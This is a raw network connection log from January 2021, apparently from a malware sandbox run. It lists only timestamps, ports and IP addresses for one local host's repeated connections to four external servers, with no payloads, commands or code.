Jan 12, 2021 01:44:55.564959049 CET	1512	49268	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:55.565104961 CET	49268	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:55.566945076 CET	49268	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:55.619890928 CET	1512	49268	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:55.626650095 CET	1512	49268	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:55.626688957 CET	1512	49268	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:55.626763105 CET	49268	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:55.626811028 CET	49268	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:55.643556118 CET	49268	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:55.697688103 CET	1512	49268	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:55.697964907 CET	49268	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:55.708477020 CET	49268	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:55.708817005 CET	49268	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:55.761780977 CET	1512	49268	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:55.762142897 CET	49268	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:55.798398018 CET	1512	49268	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:55.817527056 CET	1512	49268	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:55.916234970 CET	1512	49268	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:55.916301012 CET	1512	49268	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:55.916541100 CET	49268	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:55.922179937 CET	49268	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:55.975138903 CET	1512	49268	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:56.042999983 CET	49269	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:56.094866037 CET	443	49269	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:56.095002890 CET	49269	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:56.096867085 CET	49269	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:56.148550987 CET	443	49269	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:56.163307905 CET	443	49269	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:56.163450003 CET	49269	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:56.177968979 CET	49269	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:56.232197046 CET	443	49269	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:56.232294083 CET	49269	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:56.238158941 CET	49269	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:56.238269091 CET	49269	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:56.289930105 CET	443	49269	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:56.290028095 CET	49269	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:56.341851950 CET	443	49269	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:56.460323095 CET	443	49269	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:56.460366011 CET	443	49269	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:56.460551023 CET	49269	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:56.466206074 CET	49269	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:56.518120050 CET	443	49269	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:56.588561058 CET	49270	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:56.631959915 CET	3308	49270	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:56.632102013 CET	49270	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:56.633867025 CET	49270	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:56.676892996 CET	3308	49270	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:56.687833071 CET	3308	49270	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:56.687866926 CET	3308	49270	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:56.687928915 CET	49270	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:56.687963009 CET	49270	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:56.699392080 CET	49270	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:56.744330883 CET	3308	49270	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:56.744443893 CET	49270	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:56.749495983 CET	49270	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:56.749664068 CET	49270	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:56.792752981 CET	3308	49270	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:56.792949915 CET	49270	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:56.833483934 CET	3308	49270	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:56.836179972 CET	3308	49270	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:56.836221933 CET	3308	49270	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:56.956000090 CET	3308	49270	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:56.956043959 CET	3308	49270	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:56.956942081 CET	49270	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:56.963313103 CET	49270	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:57.006546974 CET	3308	49270	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:57.072247028 CET	49271	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:57.127079010 CET	3389	49271	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:57.127222061 CET	49271	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:57.143471956 CET	49271	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:57.197863102 CET	3389	49271	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:57.231482029 CET	3389	49271	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:57.231559038 CET	3389	49271	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:57.231692076 CET	49271	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:57.231736898 CET	49271	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:57.241345882 CET	49271	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:57.300712109 CET	3389	49271	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:57.300997972 CET	49271	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:57.311188936 CET	49271	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:57.311366081 CET	49271	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:57.365766048 CET	3389	49271	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:57.366075039 CET	49271	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:57.405287027 CET	3389	49271	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:57.420147896 CET	3389	49271	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:57.420186996 CET	3389	49271	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:57.509635925 CET	3389	49271	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:57.509682894 CET	3389	49271	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:57.510118008 CET	49271	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:57.515660048 CET	49271	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:57.569670916 CET	3389	49271	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:57.634135962 CET	49272	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:57.687345028 CET	1512	49272	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:57.687505960 CET	49272	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:57.689460993 CET	49272	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:57.742532015 CET	1512	49272	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:57.749557972 CET	1512	49272	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:57.749599934 CET	1512	49272	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:57.749665022 CET	49272	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:57.749712944 CET	49272	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:57.766398907 CET	49272	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:57.820638895 CET	1512	49272	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:57.820893049 CET	49272	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:57.831032991 CET	49272	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:57.831396103 CET	49272	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:57.884533882 CET	1512	49272	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:57.884742022 CET	49272	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:57.937941074 CET	1512	49272	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:58.041783094 CET	1512	49272	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:58.041825056 CET	1512	49272	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:58.042010069 CET	49272	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:58.047993898 CET	49272	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:58.101171017 CET	1512	49272	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:58.165330887 CET	49273	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:58.217608929 CET	443	49273	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:58.217750072 CET	49273	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:58.219502926 CET	49273	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:58.271598101 CET	443	49273	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:58.286957026 CET	443	49273	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:58.287111998 CET	49273	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:58.300939083 CET	49273	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:58.355506897 CET	443	49273	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:58.355717897 CET	49273	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:58.365823984 CET	49273	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:58.366137028 CET	49273	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:58.418231010 CET	443	49273	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:58.418344975 CET	49273	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:58.455249071 CET	443	49273	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:58.470594883 CET	443	49273	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:58.589379072 CET	443	49273	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:58.589466095 CET	443	49273	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:58.589505911 CET	49273	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:58.589555025 CET	49273	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:58.592612982 CET	49273	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:58.644900084 CET	443	49273	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:58.706629038 CET	49274	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:58.749917984 CET	3308	49274	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:58.750089884 CET	49274	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:58.751379013 CET	49274	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:58.794488907 CET	3308	49274	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:58.809665918 CET	3308	49274	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:58.809685946 CET	3308	49274	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:58.809779882 CET	49274	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:58.817260981 CET	49274	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:58.862946033 CET	3308	49274	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:58.863164902 CET	49274	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:58.872823954 CET	49274	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:58.873071909 CET	49274	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:58.916234970 CET	3308	49274	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:58.916412115 CET	49274	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:58.955296040 CET	3308	49274	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:58.959557056 CET	3308	49274	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:58.959609032 CET	3308	49274	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:59.074316978 CET	3308	49274	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:59.074361086 CET	3308	49274	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:59.074692011 CET	49274	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:59.080394030 CET	49274	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:59.123780966 CET	3308	49274	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:59.194142103 CET	49275	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:59.248420000 CET	3389	49275	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:59.248574018 CET	49275	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:59.249939919 CET	49275	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:59.303971052 CET	3389	49275	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:59.327613115 CET	3389	49275	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:59.327656031 CET	3389	49275	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:59.327761889 CET	49275	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:59.330648899 CET	49275	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:59.337413073 CET	49275	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:59.396424055 CET	3389	49275	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:59.396730900 CET	49275	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:59.408014059 CET	49275	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:59.408168077 CET	49275	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:59.462043047 CET	3389	49275	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:59.462182999 CET	49275	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:59.501264095 CET	3389	49275	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:59.516386986 CET	3389	49275	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:59.516431093 CET	3389	49275	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:59.607800961 CET	3389	49275	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:59.607841015 CET	3389	49275	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:59.607978106 CET	49275	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:59.608023882 CET	49275	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:59.613428116 CET	49275	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:59.667625904 CET	3389	49275	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:59.725152969 CET	49276	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:59.777982950 CET	1512	49276	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:59.778156996 CET	49276	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:59.780131102 CET	49276	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:59.832847118 CET	1512	49276	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:59.840626955 CET	1512	49276	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:59.840670109 CET	1512	49276	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:59.840735912 CET	49276	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:59.840770006 CET	49276	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:59.855693102 CET	49276	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:59.909759045 CET	1512	49276	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:59.910094976 CET	49276	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:59.919636011 CET	49276	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:59.919819117 CET	49276	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:59.972595930 CET	1512	49276	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:59.972932100 CET	49276	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:00.010341883 CET	1512	49276	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:00.025830984 CET	1512	49276	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:00.025878906 CET	1512	49276	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:00.130218983 CET	1512	49276	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:00.130264044 CET	1512	49276	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:00.130556107 CET	49276	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:00.136230946 CET	49276	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:00.189107895 CET	1512	49276	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:00.317719936 CET	49277	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:00.370265961 CET	443	49277	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:00.370460987 CET	49277	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:00.372956991 CET	49277	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:00.425256968 CET	443	49277	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:00.440151930 CET	443	49277	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:00.440274954 CET	49277	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:00.447166920 CET	49277	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:00.501946926 CET	443	49277	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:00.502053022 CET	49277	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:00.512394905 CET	49277	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:00.512753010 CET	49277	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:00.565085888 CET	443	49277	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:00.565462112 CET	49277	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:00.603173018 CET	443	49277	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:00.617854118 CET	443	49277	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:00.736360073 CET	443	49277	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:00.736403942 CET	443	49277	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:00.736597061 CET	49277	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:00.739125013 CET	49277	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:00.791455984 CET	443	49277	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:00.847151041 CET	49278	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:00.890510082 CET	3308	49278	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:00.890624046 CET	49278	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:00.901761055 CET	49278	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:00.945031881 CET	3308	49278	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:00.957031012 CET	3308	49278	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:00.957072020 CET	3308	49278	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:00.957129002 CET	49278	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:00.957163095 CET	49278	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:00.967776060 CET	49278	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:01.012784958 CET	3308	49278	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:01.012856960 CET	49278	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:01.017563105 CET	49278	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:01.017746925 CET	49278	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:01.060887098 CET	3308	49278	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:01.061176062 CET	49278	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:01.100331068 CET	3308	49278	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:01.104363918 CET	3308	49278	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:01.104403973 CET	3308	49278	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:01.217746019 CET	3308	49278	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:01.217787027 CET	3308	49278	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:01.218010902 CET	49278	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:01.220094919 CET	49278	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:01.263211966 CET	3308	49278	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:01.326750994 CET	49279	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:01.381102085 CET	3389	49279	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:01.381190062 CET	49279	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:01.381994009 CET	49279	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:01.436244965 CET	3389	49279	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:01.454269886 CET	3389	49279	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:01.454317093 CET	3389	49279	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:01.454440117 CET	49279	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:01.459709883 CET	49279	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:01.523152113 CET	3389	49279	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:01.523263931 CET	49279	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:01.532357931 CET	49279	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:01.532566071 CET	49279	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:01.586947918 CET	3389	49279	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:01.587125063 CET	49279	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:01.626377106 CET	3389	49279	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:01.641485929 CET	3389	49279	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:01.641527891 CET	3389	49279	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:01.732673883 CET	3389	49279	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:01.732717991 CET	3389	49279	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:01.732779026 CET	49279	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:01.732812881 CET	49279	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:01.735112906 CET	49279	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:01.789258003 CET	3389	49279	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:01.852273941 CET	49280	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:01.905080080 CET	1512	49280	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:01.905194044 CET	49280	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:01.906852007 CET	49280	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:01.959733009 CET	1512	49280	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:01.966486931 CET	1512	49280	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:01.966527939 CET	1512	49280	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:01.966567993 CET	49280	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:01.966701984 CET	49280	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:01.974211931 CET	49280	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:02.028017998 CET	1512	49280	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:02.028117895 CET	49280	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:02.036639929 CET	49280	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:02.036946058 CET	49280	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:02.089751005 CET	1512	49280	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:02.089854956 CET	49280	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:02.126354933 CET	1512	49280	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:02.142843008 CET	1512	49280	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:02.241007090 CET	1512	49280	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:02.241049051 CET	1512	49280	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:02.241127968 CET	49280	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:02.241183043 CET	49280	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:02.246330023 CET	49280	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:02.299154997 CET	1512	49280	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:02.359911919 CET	49281	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:02.412184000 CET	443	49281	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:02.412287951 CET	49281	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:02.413544893 CET	49281	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:02.465756893 CET	443	49281	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:02.480573893 CET	443	49281	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:02.480674982 CET	49281	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:02.492027044 CET	49281	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:02.546680927 CET	443	49281	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:02.546772957 CET	49281	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:02.556621075 CET	49281	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:02.556802034 CET	49281	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:02.608999968 CET	443	49281	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:02.609107971 CET	49281	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:02.661458969 CET	443	49281	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:02.780056000 CET	443	49281	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:02.780109882 CET	443	49281	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:02.780162096 CET	49281	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:02.780194044 CET	49281	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:02.785725117 CET	49281	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:02.837865114 CET	443	49281	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:02.908559084 CET	49282	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:02.951847076 CET	3308	49282	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:02.952157974 CET	49282	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:02.953403950 CET	49282	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:02.996655941 CET	3308	49282	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:03.007371902 CET	3308	49282	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:03.007430077 CET	3308	49282	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:03.007472992 CET	49282	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:03.007508993 CET	49282	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:03.021960020 CET	49282	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:03.068291903 CET	3308	49282	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:03.068670034 CET	49282	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:03.075066090 CET	49282	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:03.075264931 CET	49282	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:03.118365049 CET	3308	49282	80.86.91.27	192.168.2.22
